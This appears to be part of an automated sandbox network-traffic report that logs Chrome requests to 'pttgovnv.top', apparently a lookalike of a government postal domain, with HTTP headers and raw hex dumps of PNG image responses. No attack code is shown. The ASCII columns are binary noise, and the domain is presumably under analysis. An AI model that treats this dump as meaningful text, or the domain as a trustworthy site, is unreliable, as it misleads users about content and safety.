          2024-09-01 22:25:25 UTC1369INData Raw: 72 4c 98 23 c4 b5 38 c4 f9 0e 70 c7 0f c3 48 3f bf 7d 53 31 0f 2b dc f9 bb d6 5c cb c9 dd e1 ac 42 a5 b4 ca 5a 24 76 1d ab 0e 44 53 cb 21 59 6e 22 c6 56 2b 69 7d 6e 8c cc b9 71 e0 b8 c4 6f cd f1 cf 3d 5d eb f2 59 f5 bd 77 43 ea 1b a5 a1 a7 32 dd 16 9c a7 b6 af a9 34 cc 8d d3 3f 2e a8 fe bd 05 b9 1e 2d 72 84 b8 76 86 38 02 5c 99 0a 7a a4 9a 69 71 ab 12 52 fc b4 74 de 1d 4a 99 7c 76 72 3e b8 3f 37 3f a5 af 3f 8e f8 dc b8 35 9f 73 d1 16 cd 3a df 3f 37 e9 eb 0c 3c 86 37 f9 5c ce 02 b9 9e 24 04 cc 6c 07 ff 34 c8 f9 fc ee ed ba eb 34 c4 0d 29 06 42 5c bb 42 9c ee a2 98 7b aa 7c e2 0b 70 f1 85 b7 cd 8a 47 2a 9d 89 e3 f2 59 d6 2c 9b bf 5e ad 18 fd dd 5c 54 1f 9b a9 5b 09 a5 7c 0f 1a fe ac 8b 85 d1 bb 43 b9 d6 4f ac 7f 56 ed 0d 6f af b9 34 d7 95 95 1b 24 82 9c 37
          Data Ascii: rL#8pH?}S1+\BZ$vDS!Yn"V+i}nqo=]YwC24?.-rv8\ziqRtJ|vr>?7??5s:?7<7\$l44)B\B{|pG*Y,^\T[|COVo4$7
          2024-09-01 22:25:25 UTC1369INData Raw: 56 2b 29 23 dd c2 32 32 ad 55 7f 2b bd 95 d1 ed 1b 41 e0 93 fa 7d 52 8e cb 9b 90 8f 59 eb 4f dd 00 f7 eb fb 95 e3 0d 71 df cd 91 a3 40 24 a1 bb 67 25 c0 fd 5a 96 33 13 fe 5d 2c b4 7b 50 e7 bc 32 0b d5 86 ba 00 30 63 6b 41 88 6b 49 80 cb cd 22 08 06 b6 8e cf 4f 80 7b a9 68 e4 73 b6 dd 85 d6 0f fc b3 fa 90 75 39 56 2b af 85 09 7e 12 d4 de 29 59 88 5a 3f fe 4e ff 7b df 74 65 3e ad 5d 47 45 5b ef aa be 8f 89 c3 f3 22 9c 20 a7 af 7f 17 61 f8 de 84 ee 27 47 e5 b8 70 18 e4 46 35 bf 17 43 dd 36 6a f8 e7 97 45 1c c3 68 40 88 0b 58 48 eb 2f e5 83 79 43 66 23 b8 dc ab 66 ba 8e 6d 7f 99 27 01 7f 4e 1f ad 8e 31 94 d6 1b fd 78 6b 02 8e ab 40 7e e9 7c 17 93 b0 82 9c 8b 56 b8 95 d3 00 f7 52 8e f9 8e 09 2b cb cf bc 57 f3 fb 62 e6 e0 98 6c bd af 39 41 ae db 18 13 d7 3e a7
          Data Ascii: V+)#22U+A}RYOq@$g%Z3],{P20ckAkI"O{hsu9V+~)YZ?N{te>]GE[" a'GpF5C6jEh@XH/yCf#fm'N1xk@~|VR+Wbl9A>
          2024-09-01 22:25:25 UTC1369INData Raw: 33 46 7f a8 97 c9 07 04 b8 76 b0 1d e2 ba 57 f1 d9 5f ff 31 d4 9b ba 90 26 37 2c 1d be cf c7 34 c0 4d 14 40 88 0b 22 c0 25 a5 03 dc 4b 90 9b 28 f7 0b 4b ca 6e 0e e3 e0 4a 4e cf 1c 95 2f ed ef aa db 33 46 63 ad 20 01 54 c3 a2 b6 20 c4 05 14 e0 ea 56 8e 43 0f c7 7a 11 cc 6e 0e 7a ad 36 b9 cb bd 22 b8 79 c5 58 32 80 6b 11 84 38 58 0c 70 79 b7 ea 27 0f c7 3c 35 4b 71 34 15 de 7a d9 f8 3c dd 5d ca 6c d2 ee a0 05 10 f8 d5 3e 45 00 42 5c 1b 02 dc 4b 90 1b 2b 3d bd de 25 09 4e cd 8c c3 d0 8b 0f 87 be 95 8d 7c ae b2 10 f3 87 f4 f1 0f a7 b9 35 b4 3a 00 bf 62 31 76 10 e2 5a 13 e0 5e 0c 3d 1c ff 99 f7 dd 1c f4 52 2a d2 fa 16 e2 e2 bb 32 1e 51 5a 41 df a7 9f a9 cc 64 1b 98 f1 8d 6d 0c 1e 6d 69 11 eb 2b 20 6e 07 7f 7e 59 10 e4 40 88 f3 ec de 61 80 cb 17 62 6d 57 b7 aa
          Data Ascii: 3FvW_1&7,4M@"%K(KnJN/3Fc T VCznz6"yX2k8Xpy'<5Kq4z<]l>EB\K+=%N|5:b1vZ^=R*2QZAdmmi+ n~Y@abmW
          2024-09-01 22:25:25 UTC1369INData Raw: 0d f0 dc aa db ad 38 25 c0 81 10 87 a2 77 e3 9f 22 ae 30 c2 09 aa 3a c0 cd 95 6e 8d 20 c4 b9 3f 77 a5 a2 7d 74 f4 ec 12 44 16 d6 6e 00 e4 79 ee 0e e7 ca cd 7e c0 75 ca 50 8e c9 45 8b e6 67 d3 e2 e8 3a c0 b9 68 f1 be ad 33 ae cf 74 a5 d6 3d ae 19 17 38 08 71 28 fa 45 2e ad 03 f7 1e 5e e9 a4 e0 17 bb ed 63 71 bf 0e d8 4b 80 73 3d 50 fd a8 e1 35 cd 42 33 76 5a d6 4a fd c8 5a cf aa 86 39 1d de a6 d9 f3 84 bb 66 98 ab 32 bc 4a df fb c4 c9 b5 e6 2e c0 d9 28 8f 01 97 25 08 71 f0 6d e8 e9 75 26 05 42 88 ed d9 97 7b 4e ef 6c 75 37 b1 8f 00 97 4b 38 5d 7f de 80 4c 3d dc 80 5c 98 30 37 cb 6e 42 76 9d bf 3a 64 0c b3 9f d7 e1 ed 2c f0 32 94 73 f7 da d1 b3 9f 9b 16 cd be a5 6b 2d 31 d7 9a ab 32 bd b6 30 bb d6 46 57 32 37 6a 70 82 d9 a9 ed ad 0c e5 8b f6 93 72 df dd 93
          Data Ascii: 8%w"0:n ?w}tDny~uPEg:h3t=8q(E.^cqKs=P5B3vZJZ9f2J.(%qmu&B{Nlu7K8]L=\07nBv:d,2sk-120FW27jpr


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          58192.168.2.449799104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:24 UTC364OUTGET /api/MC4zMTIwODY0MDU2MjE5NDY4 HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC565INHTTP/1.1 404 Not Found
          Date: Sun, 01 Sep 2024 22:25:25 GMT
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uFQDPhmU5SGurGF6AaA5TenwJW898DaEvKpxtZyVKohc84eyquH8exzrEkDAuUD4CYIvKSFOkmbVqBPGrn7mbhvFF5Q%2FVbMnfSvjR53gKUud5PsFSueJTN6kMvzg3hQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1308e2435e-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          59192.168.2.449800172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:24 UTC599OUTGET /help/layout/images/35.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC726INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:25 GMT
          Content-Type: image/png
          Content-Length: 10360
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"2878-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36234
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1t60tvmtDEp6efBHJdtrNg%2FvgMmOs8TYa8RU20JH9QxNNWYEHZfP13AUZecLdI7DZtdv596VvPEnCCBuelxj%2Biw1swXQwuog3NpuvVU1oswp%2FiJmGxurG8yQ1Y%2Bjt4o%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad139de243a5-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC643INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 28 05 49 44 41 54 78 da ec dd 4d 7a d3 58 fa 37 60 c1 d5 f3 d0 2b 20 bd 82 a4 a6 ff 09 ae 15 90 1e f5 10 b3 02 52 2b c0 ac a0 c2 0a 30 c3 1a 11 56 80 99 bc d3 4a 56 50 66 05 0d 2b e0 f5 43 1e 75 a9 5c f9 b0 ec 23 5b b2 ef fb ba 7c d1 5d 10 47 96 e4 73 7e 3a 9f 8f be 7f ff 5e 01 00 30 2c 8f 9d 02 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<(IDATxMzX7`+ R+0VJVPf+Cu\#[|]Gs~:^0,!!!@@@8888!!!
          2024-09-01 22:25:25 UTC1369INData Raw: 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 2e 7c ff 7f 27 a3 c5 6b e2 4c 00 00 43 f1 e8 fb f7 ef ce c2 4d 90 bb 5c fc 71 bc 78 9d 3f fa bf eb 99 33 b2 47 37 f9 6f d7 71 5d c7 8b d7 68 47 87 50 df 4f f3 78 7d ff cf c9 6c 87 e7 62 94 e7 e1 a1 73 71 15 c7 bd 38 d6 cb 2d 5c 9b b3 3c
          Data Ascii: 88!!!@@@@888!!!@@@@888!!!@@@@888!!!!.|'kLCM\qx?3G7oq]hGPOx}lbsq8-\<
          2024-09-01 22:25:25 UTC1369INData Raw: ec a0 0c 69 b2 cb 0c ec 90 96 b8 f2 05 69 3c 95 9e 66 40 9a 54 7f 5d a4 b0 d9 1a 36 c9 7f fb d0 fb 4d ab 3f 5b e7 e2 fd 62 fb 91 12 ad 73 71 5c 31 19 63 92 c7 32 75 f5 6e f5 73 a1 f7 39 cd 57 a9 eb f7 97 6b f9 e8 b7 eb f1 f7 ff 9c b8 86 fc ed e1 b2 fa b3 85 3f 1e 20 a3 b7 a0 64 eb 5c dc cb f1 be 5a f6 41 88 eb af 0c 3b 97 39 a1 61 95 c2 b3 2e 38 e3 e7 ce 97 2a ee 68 0d fb d4 32 cc cd 17 7f 8c 1b fb 37 2e 07 c4 12 61 6e bc ca b1 1c d4 75 ff cf 49 a9 f3 f1 bf f7 89 c0 55 f0 fa d5 ce 2a b3 55 59 ed 01 73 5a fd 75 d8 c7 a6 84 38 d8 11 dd a9 ab 8b f0 f6 7b 6e 83 55 ef 9a 30 5a a1 e0 8c ca fa b8 ba d9 6f 75 59 1d e6 56 de ce a6 b1 a0 70 bc 67 4c a8 28 d5 4d f2 b4 71 2c c7 2e 77 a7 c1 30 2a d1 b8 de 6f 0b be ed 73 13 1c 58 b1 0c 89 87 88 92 13 a8 2c 35 02 3b a2
          Data Ascii: ii<f@T]6M?[bsq\1c2uns9Wk? d\ZA;9a.8*h27.anuIU*UYsZu8{nU0ZouYVpgL(Mq,.w0*osX,5;
          2024-09-01 22:25:25 UTC1369INData Raw: 3f f3 d3 e5 1e 91 fc ff 57 d5 6e bb 9f 5f 17 0c b8 fb 14 e0 42 b1 1e ac bd 0e 71 b1 52 fd e2 35 bf a5 50 38 5d f3 e2 9d e7 be a9 93 87 f6 4d 6d 74 57 fe 5c dd cc 72 5a 7e 4a b9 e8 53 0b d6 86 41 ee d5 2a fb c8 b2 95 2f b7 69 ff ac e2 bc 50 50 fa 5c 62 b6 5d 23 74 0c 75 0b af 4d 83 dc f1 86 bf ff 78 e9 5c ce 7a 12 84 5f dc d7 dd 7b a0 01 ee 47 f0 16 e2 ee 0f 6f b1 cf 63 dc c4 9f ee 38 59 6b dd dc 8b c2 ea 22 2b c9 08 85 31 88 f3 7b 76 91 4e 33 e0 8d 96 83 59 4c 22 c8 cd ea df 2c 05 a4 68 e2 ee d5 98 b2 0c 72 e3 35 7f dc 22 aa 9b df b7 a7 9b 16 bc 3d 5c ff ec ba 87 a7 fa a0 83 6e 63 79 89 12 a6 85 8e 67 56 b2 62 1b 60 60 d9 34 c4 9d f6 30 c0 d5 7e dd 87 87 fc 82 01 ee c7 c3 8f 10 77 7b 25 18 e3 de 22 4c fc f1 d0 13 5d 9b cd b3 97 82 4e 5c c8 66 37 69 34 57
          Data Ascii: ?Wn_BqR5P8]MmtW\rZ~JSA*/iPP\b]#tuMx\z_{Goc8Yk"+1{vN3YL",hr5"=\ncygVb``40~w{%"L]N\f7i4W
          2024-09-01 22:25:25 UTC1369INData Raw: b3 ab 0a 68 be c1 cf 6e a5 bc cc b1 63 df 36 7d 9f 1d ae 9b d9 45 d8 bd 2c 71 4e 0a 04 f9 2e ea b6 92 01 ee fd b6 02 5c 2f 42 5c 6e 95 15 4f 3d b1 9b c1 2e 36 3f 3e db 56 a1 d0 08 73 f5 22 c1 11 56 df e5 36 5d 93 9e 2f 94 7b 59 fa ba ab 2b 37 f6 d6 58 38 3a 10 bd 20 7f c4 a0 f6 2e 96 42 c9 96 fd 75 b6 88 7b d3 e5 d8 a2 5b 94 f8 5d bb 2a d3 c7 1d 5c b7 af d5 9e cd 82 8f ad 31 4b 07 b8 08 cf db 1c 2e b5 d3 10 97 4b 2c c4 17 fa c5 0e 0f e3 69 c1 c1 eb ab 86 b9 f8 82 fd 73 f1 7a 59 dd 74 53 1e 35 0a ce 98 e5 7a de b7 40 d7 b2 e0 5d a5 f0 b3 24 c6 66 e2 5a 4c 9c 06 3a 14 83 fb 3f 75 d4 63 30 6d f9 ef af 73 3b c0 6d 1a ea 1e bb ef 3b 0c bb a5 1e 1a 47 bb 3e 49 19 e0 5e 14 3e ef e3 6d 7f 8e 9d 84 b8 dc 2a 6b 5e 95 1f f7 f6 79 cd 9f db fa 89 cf 31 73 d1 65 71 96
          Data Ascii: hnc6}E,qN.\/B\nO=.6?>Vs"V6]/{Y+7X8: .Bu{[]*\1K.K,iszYtS5z@]$fZL:?uc0ms;m;G>I^>m*k^y1seq
          2024-09-01 22:25:25 UTC1369INData Raw: e0 ea e3 5d 67 c0 fc d4 7d f9 f7 1b b5 59 f8 af 3a a5 3d d7 e0 5b b5 60 fe 26 3c c3 76 e4 77 b8 64 c5 d3 ba ac cd 35 db a2 61 e0 83 00 c7 80 4d b6 bd c7 f9 da 8b fd 16 0a 72 ef 72 cc 5a e7 b2 eb ea 4d db c0 12 5d 7b ee cb 5b bd 69 39 13 ad cd 75 b6 0d 17 6c 57 c9 07 d6 56 21 2e 57 d2 ef d3 56 4e d7 59 57 bc 74 5b d0 d2 51 b5 e5 c5 eb 37 da b1 61 80 41 2e 02 d9 c7 96 3f f6 3a 07 e4 1f bc c6 13 c6 e7 36 33 71 72 22 cc aa 63 6e be 98 19 0c db 95 dd 9f d7 85 de 6e e5 f2 72 51 a6 44 85 f7 ae da ed 1a 6e 31 2c e4 7d 86 b6 7f 2d ce c5 69 96 6f 73 77 06 6b 78 9e c3 02 fa 1f e2 96 82 dc e7 21 04 b9 ea a6 45 a8 6d 61 75 99 8b 19 1f ba e3 3c 77 6d 6f d0 f3 8e fe 2d 50 ce ac 54 6b c4 2a db 11 e5 cc d8 57 3b f8 9c 51 86 bd 6d 84 b6 18 c3 f7 63 56 ed ba 63 f9 18 bc 58
          Data Ascii: ]g}Y:=[`&<vwd5aMrrZM]{[i9ulWV!.WVNYWt[Q7aA.?:63qr"cnnrQDn1,}-ioswkx!Emau<wmo-PTk*W;QmcVcX
          2024-09-01 22:25:25 UTC1369INData Raw: 9d a4 0c 4b 75 17 6b db 85 f6 ea 56 b9 59 57 a1 a9 b1 54 4a 9b 63 8b 80 19 ad 72 93 7d ea 62 cd c0 3c ab 1e ee 42 8d 49 0c 02 5c 3f be 5f d3 aa 5c 97 c0 c9 a6 c1 29 ef 89 f7 85 8e e7 a8 ea 78 d2 d3 1e 84 b7 b3 c5 2b 82 f3 ef 55 77 33 2f ef 6a ad 28 b5 94 50 d7 dd 9c ab 94 69 6d bf 27 ec 8f 71 c1 f7 9a ee 5d 88 6b 14 ee b3 6c f9 7a b9 46 f2 7d 56 87 a6 8e 8e ed 2a 8f ed 97 aa dd 58 b9 78 ea 9d ef 43 98 8b 31 7f 11 98 57 28 ec de 98 85 da 3b 25 67 47 45 05 f5 7b ae e1 78 da 83 e3 a9 27 3d 45 98 1b 1f f2 6c f1 68 51 8a 27 fd e8 1a 8c e0 b6 78 7d cd ef ec f3 0e 7f 6d 94 87 97 77 b4 62 94 7a 88 3b 2f 39 9e 68 e9 9c 4d bb 08 5d 03 1c 0f c8 5d 75 df ff 5d 47 c8 2f 35 2c a5 c8 96 5c ff 18 40 cb c1 34 d7 1e 8b 0f bb ea 38 85 1f a1 29 7f ee 3c c7 b5 95 3e b6 8b 5c
          Data Ascii: KukVYWTJcr}b<BI\?_\)x+Uw3/j(Pim'q]klzF}V*XxC1W(;%gGE{x'=ElhQ'x}mwbz;/9hM]]u]G/5,\@48)<>\
          2024-09-01 22:25:25 UTC1369INData Raw: 97 0c 6e c7 19 30 e7 15 07 11 e4 22 ac f7 29 38 c5 fd 97 0f 5d bd 08 4e 19 5c 0e 75 fd c3 eb 66 b0 29 74 2e c7 3d 0c c5 71 ff 9f de 32 db b6 eb 63 bd ea c9 7b ac 72 ed ae 0a 9c 8b ab 2d 7f b6 d9 16 ce c9 9b 0d df 66 ad ba f6 d1 f7 ef df d5 60 d5 5f 66 68 c6 13 e2 b3 07 d2 f2 34 5e db 0c 38 39 4e e8 38 8f b1 39 39 61 9d b1 4c 9f ab 3f 27 42 fc 78 ed 5b 58 cb f3 f5 47 81 20 f1 e8 00 bf 0b f1 1d b8 a8 ca 2e 1c fb 39 97 df 59 f7 5a 4e ab f2 33 0c 7f aa 27 ff ac 7c 3f dc 2c 65 11 df 95 a3 03 b9 1d a2 bc 9b ac 33 6b 6e c5 f3 79 9c c1 78 d7 63 32 a3 4c 3c bf 6f cc 5a 6e 9f f5 69 83 df f1 f3 7d 4b b1 e4 be b6 eb 8e b9 fc 9c 5d bf db 79 c0 ba d9 a2 6c dd 71 ab d7 8b 63 3d 6d f9 fb 22 44 6f 32 ee ec 9f 05 b7 7e bb ef 38 af 36 b8 97 7f 59 61 c1 6c 21 ae 65 45 36 ca
          Data Ascii: n0")8]N\uf)t.=q2c{r-f`_fh4^89N899aL?'Bx[XG .9YZN3'|?,e3knyxc2L<oZni}K]ylqc=m"Do2~86Yal!eE6
          2024-09-01 22:25:25 UTC134INData Raw: 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 40 f5 ff 05 18 00 7b d5 9d 19 fe e3 fe 6b 00 00 00 00 49 45 4e 44 ae 42 60 82
          Data Ascii: qqqBBB qqqBBB@{kIENDB`


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          60192.168.2.449801172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC599OUTGET /help/layout/images/36.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC723INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:25 GMT
          Content-Type: image/png
          Content-Length: 7852
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"1eac-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36234
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tKFp%2FV8un2hAmA%2FoXqjkZhQIc7Jzql8AfSyn2bNDpot1GcYlCwsdtRbMLvzHIcdu9aMW2mDCjuNRKL2BgGWewodiceezzEe3H%2B4vHeVButTOHt1iKWNXYaWvr6XNS6w%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad14294f18ea-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC646INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 1e 39 49 44 41 54 78 da ec dd 4f 72 db 46 da 07 60 64 2a fb f8 ab ca de ca 09 e2 9c c0 cc 2a 4b 2b ab d9 4c 95 e1 13 44 39 81 e9 13 44 3e 41 a8 aa d9 cc 2a d2 32 ab a1 4e 10 e9 04 23 ed 53 35 d6 05 92 0f 6d b5 12 8e 22 fe 69 10 04 5f 80 cf 53 c5 d2 8c 23 89 54 83 04 7e e8 3f 6f 7f f2 fb ef bf 57 00 00 0c cb 27 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<9IDATxOrF`d**K+LD9D>A*2N#S5m"i_S#T~?oW'B qqqBBBB
          2024-09-01 22:25:25 UTC1369INData Raw: 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 84 f3 db cf 9f 3f 6b be 1c 37 8f 17 f9 f1 e0 aa 79 9c fe ed 9b 5f 6f b4 12 00 08 71 c4 09 6f 93 e6 4b dd 3c 5e af f9 d6 37 4d 90 9b 69 31 00 10 e2 d8 7f 78 9b 36 8f 97 05 3f f6 75 13 e4 e6 5a 0f 00 84 38 fa 0f 6f 47 cd 97 59 61 78 7b 70 d9 84 b8 89 56 04 00 21 8e 7e 03 dc b4 f9 f2 76 cb 5f f3 7f 4d 90 fb a0 35 01 e0 7f 7d aa 09 d8 41 78 4b 0b 15 66 cd e3 cb 0e 7e 5d fa 5d 73 ad 0a 00 ff eb 6f 9a 80 8e 03 dc 49 f3 e5 97 8e 02 1c 00 b0 84 9e 38 ba 0a 6f a9 64 c8 ac 79 bc ea f8 57 4f 2a 3d 71 00 20 c4 b1 93 00 97 86 3c cf 9b c7 f3 1d fc 7a 01 0e 00 9e 60 38 95 6d 03 dc 71 0e 5a cf b5 06 00 08 71 0c
          Data Ascii: qBBB qqq?k7y_oqoK<^7Mi1x6?uZ8oGYax{pV!~v_M5}AxKf~]]soI8odyWO*=q <z`8mqZq
          2024-09-01 22:25:25 UTC1369INData Raw: c0 21 d1 13 37 cc 00 97 42 4c 49 20 4b a5 3a 76 bd 2b c3 ac 45 80 bb 2b 0d 70 d9 f1 a3 ff 3f f5 ae 00 40 88 63 08 52 20 2b 59 cc 70 b2 cb 1d 0c 72 af e0 ab c2 1f 6b 1b e0 1e 87 b6 cb 5d d7 bb 03 80 88 0c a7 0e 4c 9e 77 f6 4b c1 8f ec 74 a8 b1 c5 eb 59 0c 70 57 2d 9e 2f fd 2d 8b 8b 39 be 68 7e cf 8d 77 46 bf fe fe f7 7f 4c 82 be b4 ab 7f fd eb 9f 1f 7a 6c 87 a3 e6 cb 51 fe bf 8b ff 9b 9e 35 c7 7d da e1 79 cd b1 5c f3 39 b3 b5 61 0c 4a 8c 0c 4f 98 c5 0c 0b 3b 32 94 aa b7 28 73 b2 78 a2 7e df 67 80 6b 2e d8 8f e7 e2 45 f2 55 73 11 bb ea a9 1d 4a 8b 4b f7 e9 8b e6 f1 61 07 7f 73 ba 59 79 fc f8 ac 22 82 cb b6 e7 b9 7c 0e 4b c7 72 92 1f 29 b8 3d d7 a4 ab 6f c2 9b f3 ee 33 cd 20 c4 51 7e c2 49 27 99 97 05 3f b2 eb 90 33 6b 71 c2 7b d3 b6 20 ef a3 bf ff ae ea 7f
          Data Ascii: !7BLI K:v+E+p?@cR +Yprk]LwKtYpW-/-9h~wFLzlQ5}y\9aJO;2(sx~gk.EUsJKasYy"|Kr)=o3 Q~I'?3kq{
          2024-09-01 22:25:25 UTC1369INData Raw: e5 b9 70 4a 4f 0c 47 bd e2 f3 3e 75 2c f7 4a 2f 9c 10 47 1f 21 ae cb 6d b6 72 2f 5c e9 89 73 da f2 b9 1e 86 4a fe a8 07 b7 62 1e 5c 6a 97 b6 db ea dc 16 9e 90 a2 86 97 f3 9e b7 d9 1a 62 8d bc da 29 64 30 de 2d 5b 65 9d 3f ef 6f 35 51 d8 cf 19 42 1c 4b 4c 0a bf ff b2 e3 e7 2f 0d 64 ad 56 2f 3d 0a 70 55 0e 70 37 2b 82 e5 36 27 94 7a d3 a0 9b 8b c3 46 9d 4f d5 e7 36 5b e9 22 1a 75 61 87 10 37 7c b7 cb 86 51 3b f8 bc b3 bd 0b 9b dd 0b 71 94 07 9b 49 b5 c7 61 bc 96 bd 70 db 04 b8 87 a1 d1 37 6b 0a 15 cf b6 68 97 8b c2 22 c8 91 6b c3 59 95 ba a2 46 5e f0 e0 c9 e6 61 7b 9b cf 3b bb bf 51 42 88 63 89 17 7b 7e fe 69 8b 9f 29 9a 37 f1 44 80 3b 5b 53 d0 77 9b 82 ad 77 55 79 cf 4c d4 da 70 7d f6 c2 3d ab e2 ce 45 3a 6d 19 0c 88 e3 72 c5 6a 54 05 9a f7 2f 8d ae 28 2d
          Data Ascii: pJOG>u,J/G!mr/\sJb\jb)d0-[e?o5QBKL/dV/=pUp7+6'zFO6["ua7|Q;qIap7kh"kYF^a{;QBc{~i)7D;[SwwUyLp}=E:mrjT/(-
